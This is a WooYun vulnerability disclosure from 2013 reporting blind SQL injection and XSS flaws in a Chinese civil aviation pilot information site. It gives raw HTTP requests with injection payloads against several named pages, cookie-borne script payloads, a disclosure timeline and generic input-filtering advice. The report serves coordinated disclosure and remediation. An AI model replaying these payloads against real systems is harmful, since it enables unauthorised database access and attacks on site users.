当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-027034

漏洞标题:中国民用航空总局 - 飞行人员信息管理平台盲注

相关厂商:民行飞行人员信息管理平台

漏洞作者: 0x334

提交时间:2013-06-27 16:11

修复时间:2013-08-11 16:11

公开时间:2013-08-11 16:11

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-06-27: 细节已通知厂商并且等待厂商处理中
2013-07-01: 厂商已经确认,细节仅向厂商公开
2013-07-11: 细节向核心白帽子及相关领域专家公开
2013-07-21: 细节向普通白帽子公开
2013-07-31: 细节向实习白帽子公开
2013-08-11: 细节向公众公开

简要描述:

中国民用航空总局民行飞行人员信息管理平台盲注

详细说明:

http://pilots.caac.gov.cn/examTH/namequery.asp
将参数“searchfor”的值设置为“%27+%2B+ltrim%28%27%27%29+%2B+%271234”

POST /examTH/namequery.asp HTTP/1.0
Cookie: pass=n; skins=1; ASPSESSIONIDQCDCASAQ=JNJJILHBPIHKFEGGGMPLGODJ
Content-Length: 63
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: pilots.caac.gov.cn
Content-Type: application/x-www-form-urlencoded
Referer: http://pilots.caac.gov.cn/examTH/index.asp
searchfor=%27+%2B+ltrim%28%27%27%29+%2B+%271234&B1=%CC%E1%BD%BB


0.jpg


http://pilots.caac.gov.cn/school/findpwd.asp
将参数“nationality”的值设置为“%27+%2B+ltrim%28%27%27%29+%2B+%27AEROTEC”

POST /school/findpwd.asp HTTP/1.0
Cookie: lxr=; pass=n; skins=1; ASPSESSIONIDQCDCASAQ=JNJJILHBPIHKFEGGGMPLGODJ
Content-Length: 73
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: pilots.caac.gov.cn
Content-Type: application/x-www-form-urlencoded
Referer: http://pilots.caac.gov.cn/school/enter.asp
nationality=%27+%2B+ltrim%28%27%27%29+%2B+%27AEROTEC&Submit=Find+Password


1.jpg


http://pilots.caac.gov.cn/wrdb/ltjdetail.asp
将参数“searchfor”的值设置为“%27+%2B+ltrim%28%27%27%29+%2B+%271234”

POST /wrdb/ltjdetail.asp HTTP/1.0
Cookie: pass=n; skins=1; ASPSESSIONIDQCDCASAQ=JNJJILHBPIHKFEGGGMPLGODJ
Content-Length: 63
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: pilots.caac.gov.cn
Content-Type: application/x-www-form-urlencoded
Referer: http://pilots.caac.gov.cn/wrdb/weiren.asp
searchfor=%27+%2B+ltrim%28%27%27%29+%2B+%271234&B1=%CC%E1%BD%BB


2.jpg


http://pilots.caac.gov.cn/wrdb/weirendetail.asp
将参数“searchfor”的值设置为“%27+%2B+ltrim%28%27%27%29+%2B+%271234”

POST /wrdb/weirendetail.asp HTTP/1.0
Cookie: pass=n; skins=1; ASPSESSIONIDQCDCASAQ=JNJJILHBPIHKFEGGGMPLGODJ
Content-Length: 63
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: pilots.caac.gov.cn
Content-Type: application/x-www-form-urlencoded
Referer: http://pilots.caac.gov.cn/wrdb/weiren.asp
searchfor=%27+%2B+ltrim%28%27%27%29+%2B+%271234&B1=%CC%E1%BD%BB


3.jpg


附送几个xss
http://pilots.caac.gov.cn/bbsxp/login.asp

POST /bbsxp/login.asp HTTP/1.0
Cookie: pass=n; ASPSESSIONIDQCDCASAQ=JNJJILHBPIHKFEGGGMPLGODJ; lxr=; skins=1/><script>alert(123456789)</script>
Content-Length: 88
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: pilots.caac.gov.cn
Content-Type: application/x-www-form-urlencoded
Referer: http://pilots.caac.gov.cn/bbsxp/default.asp
menu=add&url=Default.asp&username=&eremite=1&Submit1=+%B5%C7%C2%BC+&userpass=&xuansave=1


http://pilots.caac.gov.cn/bbsxp/online.asp

POST /bbsxp/online.asp HTTP/1.0
Cookie: lxr=; pass=n; ASPSESSIONIDQCDCASAQ=JNJJILHBPIHKFEGGGMPLGODJ; skins=1/><script>alert(888888888)</script>
Content-Length: 9
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: pilots.caac.gov.cn
Content-Type: application/x-www-form-urlencoded
Referer: http://pilots.caac.gov.cn/bbsxp/online.asp
username=


漏洞证明:

如上

修复方案:

若干问题的补救方法在于对用户输入进行清理。 通过验证用户输入未包含危险字符,便可能防止恶意的用户导致应用程序执行计划外的任务,例如:启动任意 SQL 查询、嵌入将在客户端执行的 Javascript 代码、运行各种操作系统命令,等等。 建议过滤出所有以下字符:
[1] |(竖线符号)
[2] & (& 符号)
[3];(分号)
[4] $(美元符号)
[5] %(百分比符号)
[6] @(at 符号)
[7] '(单引号)
[8] "(引号)
[9] \'(反斜杠转义单引号)
[10] \"(反斜杠转义引号)
[11] <>(尖括号)
[12] ()(括号)
[13] +(加号)
[14] CR(回车符,ASCII 0x0d)
[15] LF(换行,ASCII 0x0a)
[16] ,(逗号)
[17] \(反斜杠)
以下部分描述各种问题、问题的修订建议以及可能触发这些问题的危险字符: SQL 注入和 SQL 盲注: A. 确保用户输入的值和类型(如 Integer、Date 等)有效,且符合应用程序预期。 B. 利用存储过程,将数据访问抽象化,让用户不直接访问表或视图。当使用存储过程时,请利用 ADO 命令对象来实施它们,以强化变量类型。 C. 清理输入以排除上下文更改符号,例如:
[1] '(单引号)
[2] "(引号)
[3] \'(反斜线转义单引号)
[4] \"(反斜杠转义引号)
[5] )(结束括号)
[6] ;(分号)
跨站: A. 清理用户输入,并过滤出 JavaScript 代码。我们建议您过滤下列字符:
[1] <>(尖括号)
[2] "(引号)
[3] '(单引号)
[4] %(百分比符号)
[5] ;(分号)
[6] ()(括号)
[7] &(& 符号)
[8] +(加号)
B. 如果要修订 <%00script> 变体,请参阅 MS 文章 821349 C. 对于 UTF-7 攻击: [-] 可能的话,建议您施行特定字符集编码(使用 'Content-Type' 头或 <meta> 标记)。 HTTP 响应分割:清理用户输入(至少是稍后嵌入在 HTTP 响应中的输入)。 请确保输入未包含恶意的字符,例如:
[1] CR(回车符,ASCII 0x0d)
[2] LF(换行,ASCII 0x0a)远程命令执行:清理输入以排除对执行操作系统命令有意义的符号,例如:
[1] |(竖线符号)
[2] & (& 符号)
[3];(分号)
执行 shell 命令: A. 绝不将未检查的用户输入传递给 eval()、open()、sysopen()、system() 之类的 Perl 命令。 B. 确保输入未包含恶意的字符,例如:
[1] $(美元符号)
[2] %(百分比符号)
[3] @(at 符号)
XPath 注入:清理输入以排除上下文更改符号,例如:
[1] '(单引号)
[2] "(引号) 等
LDAP 注入: A. 使用正面验证。字母数字过滤(A..Z,a..z,0..9)适合大部分 LDAP 查询。 B. 应该过滤出或进行转义的特殊 LDAP 字符:
[1] 在字符串开头的空格或“#”字符
[2] 在字符串结尾的空格字符
[3] ,(逗号)
[4] +(加号)
[5] "(引号)
[6] \(反斜杠)
[7] <>(尖括号)
[8] ;(分号)
[9] ()(括号)
MX 注入: 应该过滤出特殊 MX 字符:
[1] CR(回车符,ASCII 0x0d)
[2] LF(换行,ASCII 0x0a)记录伪造:
应该过滤出特殊记录字符:
[1] CR(回车符,ASCII 0x0d)
[2] LF(换行,ASCII 0x0a)
[3] BS(退格,ASCII 0x08)
ORM 注入: A. 确保用户输入的值和类型(如 Integer、Date 等)有效,且符合应用程序预期。 B. 利用存储过程,将数据访问抽象化,让用户不直接访问表或视图。 C. 使用参数化查询 API D. 清理输入以排除上下文更改符号,例如: (*):
[1] '(单引号)
[2] "(引号)
[3] \'(反斜线转义单引号)
[4] \"(反斜杠转义引号)
[5] )(结束括号)
[6] ;(分号)

版权声明:转载请注明来源 0x334@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-07-01 23:09

厂商回复:

最新状态:

暂无